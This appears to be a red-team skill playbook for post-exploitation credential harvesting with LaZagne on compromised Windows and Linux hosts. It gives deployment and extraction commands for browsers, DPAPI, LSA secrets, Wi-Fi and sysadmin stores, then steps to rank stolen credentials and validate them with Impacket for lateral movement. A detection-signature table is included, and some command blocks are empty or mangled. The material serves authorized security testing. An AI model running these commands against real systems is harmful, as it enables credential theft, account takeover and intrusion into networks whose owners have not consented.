\title{Performing Credential Access With Lazagne}

\taxon{skill}

\tag{red-team}

\tag{credential-access}

\tag{lazagne}

\tag{post-exploitation}

\tag{password-recovery}

\tag{credential-dumping}

\tag{lateral-movement}

\meta{version}{"1.0"}

\meta{description}{Extract stored credentials from compromised endpoints using the LaZagne post-exploitation tool to recover passwords from browsers, databases, system vaults, and applications during authorized red team operations.}

\subtree{
\title{Performing Credential Access with LaZagne}
\subtree{
\title{Overview}
\p{LaZagne is an open-source post-exploitation tool designed to retrieve credentials stored on local systems. It supports Windows, Linux, and macOS, with the most extensive module library for Windows. LaZagne recovers passwords from browsers (Chrome, Firefox, Edge, Opera), email clients (Outlook, Thunderbird), databases (PostgreSQL, MySQL, SQLite), system stores (Windows Credential Manager, LSA secrets, DPAPI), Wi-Fi profiles, Git credentials, and dozens of other applications. The tool is categorized under MITRE ATT&CK T1555 (Credentials from Password Stores) and is listed as software S0349. Red teams use LaZagne after gaining initial access to harvest stored credentials that enable lateral movement and privilege escalation.}
}

\subtree{
\title{When to Use}
\ul{
\li{When conducting security assessments that involve performing credential access with lazagne}
\li{When following incident response procedures for related security events}
\li{When performing scheduled security testing or auditing activities}
\li{When validating security controls through hands-on testing}
}
}

\subtree{
\title{Prerequisites}
\ul{
\li{Familiarity with red teaming concepts and tools}
\li{Access to a test or lab environment for safe execution}
\li{Python 3.8+ with required dependencies installed}
\li{Appropriate authorization for any testing activities}
}
}

\subtree{
\title{Objectives}
\ul{
\li{Deploy LaZagne on compromised Windows, Linux, or macOS endpoints}
\li{Extract credentials from all supported password stores}
\li{Parse and prioritize recovered credentials for lateral movement}
\li{Identify high-value credentials (domain admin, service accounts, cloud access)}
\li{Document credential harvesting results with appropriate evidence handling}
\li{Correlate recovered credentials with BloodHound attack paths}
}
}

\subtree{
\title{MITRE ATT&CK Mapping}
\ul{
\li{\strong{T1555} - Credentials from Password Stores}
\li{\strong{T1555.003} - Credentials from Password Stores: Credentials from Web Browsers}
\li{\strong{T1555.004} - Credentials from Password Stores: Windows Credential Manager}
\li{\strong{T1552.001} - Unsecured Credentials: Credentials In Files}
\li{\strong{T1552.002} - Unsecured Credentials: Credentials in Registry}
\li{\strong{T1003.004} - OS Credential Dumping: LSA Secrets}
\li{\strong{T1539} - Steal Web Session Cookie}
}
}

\subtree{
\title{Workflow}
\subtree{
\title{Phase 1: LaZagne Deployment}
\ol{
\li{Transfer LaZagne to the compromised host:}
}

\subtree{
\title{Python version (requires Python on target)}
\p{git clone https://github.com/AlessandroZ/LaZagne.git cd LaZagne pip install -r requirements.txt}

\pre{\startverb
2. Verify execution capability and privileges:
\stopverb}
}

\subtree{
\title{Check current user context}
\p{whoami /priv}
}

\subtree{
\title{LaZagne works with standard user privileges for user-level stores}

}

\subtree{
\title{SYSTEM/Admin privileges needed for DPAPI master keys, LSA secrets, SAM}
\pre{\startverb

\stopverb}
}
}

\subtree{
\title{Phase 2: Full Credential Extraction (Windows)}
\ol{
\li{Run LaZagne with all modules:}
}

\subtree{
\title{Export results to JSON}
\p{lazagne.exe all -oJ}
}

\subtree{
\title{Export results to specific file}
\p{lazagne.exe all -oJ -output C:\startverb \Temp\stopverb\startverb \creds\stopverb}

\pre{\startverb
2. Run specific modules for targeted extraction:
\stopverb}
}

\subtree{
\title{Browsers only (Chrome, Firefox, Edge, Opera, IE)}
\p{lazagne.exe browsers}
}

\subtree{
\title{Windows credential stores}
\p{lazagne.exe windows}
}

\subtree{
\title{Database credentials}
\p{lazagne.exe databases}
}

\subtree{
\title{Email client credentials}
\p{lazagne.exe mails}
}

\subtree{
\title{Wi-Fi passwords}
\p{lazagne.exe wifi}
}

\subtree{
\title{Git credentials}
\p{lazagne.exe git}
}

\subtree{
\title{System credentials (requires elevated privileges)}
\p{lazagne.exe sysadmin}

\pre{\startverb

\stopverb}
}
}

\subtree{
\title{Phase 3: Credential Extraction (Linux)}
\ol{
\li{Run LaZagne on Linux targets:}
}

\subtree{
\title{Browser credentials}
\p{python3 laZagne.py browsers}
}

\subtree{
\title{System credentials (SSH keys, shadow file with root)}
\p{python3 laZagne.py sysadmin}
}

\subtree{
\title{Database credentials}
\p{python3 laZagne.py databases}
}

\subtree{
\title{Git credentials}
\p{python3 laZagne.py git}

\pre{\startverb

\stopverb}
}
}

\subtree{
\title{Phase 4: Credential Analysis and Prioritization}
\ol{
\li{Parse JSON output for unique credentials:}
\li{Prioritize credentials by value:}
\li{Domain credentials (AD accounts) for lateral movement}
\li{Cloud service credentials (AWS, Azure, GCP console)}
\li{VPN and remote access credentials}
\li{Database credentials for data access}
\li{Email credentials for business email compromise}
\li{Service account credentials for privilege escalation}
}
}

\subtree{
\title{Phase 5: Credential Validation and Use}
\ol{
\li{Validate recovered domain credentials:}
}

\subtree{
\title{Test with Impacket}
\p{smbclient.py domain.local/user:'password'@10.10.10.1}

\pre{\startverb
2. Cross-reference with BloodHound paths for high-value targets
3. Use recovered credentials for lateral movement or privilege escalation

\stopverb}
}
}
}

\subtree{
\title{Tools and Resources}
\pre{\startverb
| Tool | Purpose | Platform |
|------|---------|----------|
| LaZagne | Multi-source credential extraction | Windows/Linux/macOS |
| Mimikatz | LSASS/DPAPI credential dumping | Windows |
| SharpChrome | Chrome credential extraction (.NET) | Windows |
| SharpDPAPI | DPAPI credential decryption | Windows |
| CrackMapExec | Credential validation and spraying | Linux |
| Impacket | Remote credential testing | Linux (Python) |
\stopverb}
}

\subtree{
\title{LaZagne Module Coverage (Windows)}
\pre{\startverb
| Category | Modules |
|----------|---------|
| Browsers | Chrome, Firefox, Edge, Opera, IE, Brave, Vivaldi |
| Email | Outlook, Thunderbird, Foxmail |
| Databases | PostgreSQL, MySQL, SQLiteDB, Robomongo |
| Sysadmin | PuTTY, WinSCP, FileZilla, OpenSSH, RDPManager |
| Windows | Credential Manager, Vault, DPAPI, Autologon |
| WiFi | Stored Wi-Fi passwords |
| Git | Git Credential Store, Git Credential Manager |
| SVN | TortoiseSVN |
| Chat | Pidgin, Skype |
\stopverb}
}

\subtree{
\title{Detection Signatures}
\pre{\startverb
| Indicator | Detection Method |
|-----------|-----------------|
| LaZagne.exe process execution | EDR process monitoring with hash-based detection |
| Access to Chrome Login Data SQLite DB | File access monitoring on browser credential stores |
| DPAPI CryptUnprotectData API calls | API hooking and ETW tracing |
| Access to Windows Credential Manager | Event 5379 (Credential Manager read) |
| Mass credential store enumeration | Behavioral analysis for sequential access patterns |
| Python interpreter accessing credential files | Script block logging and file access auditing |
\stopverb}
}

\subtree{
\title{Validation Criteria}
\ul{
\li{[ ] LaZagne deployed on compromised endpoint}
\li{[ ] Full credential extraction completed (all modules)}
\li{[ ] Credentials exported in JSON format for analysis}
\li{[ ] Recovered credentials parsed and deduplicated}
\li{[ ] High-value credentials identified and prioritized}
\li{[ ] Domain credentials validated against AD}
\li{[ ] Lateral movement opportunities identified from recovered creds}
\li{[ ] Evidence documented with appropriate handling procedures}
}
}
}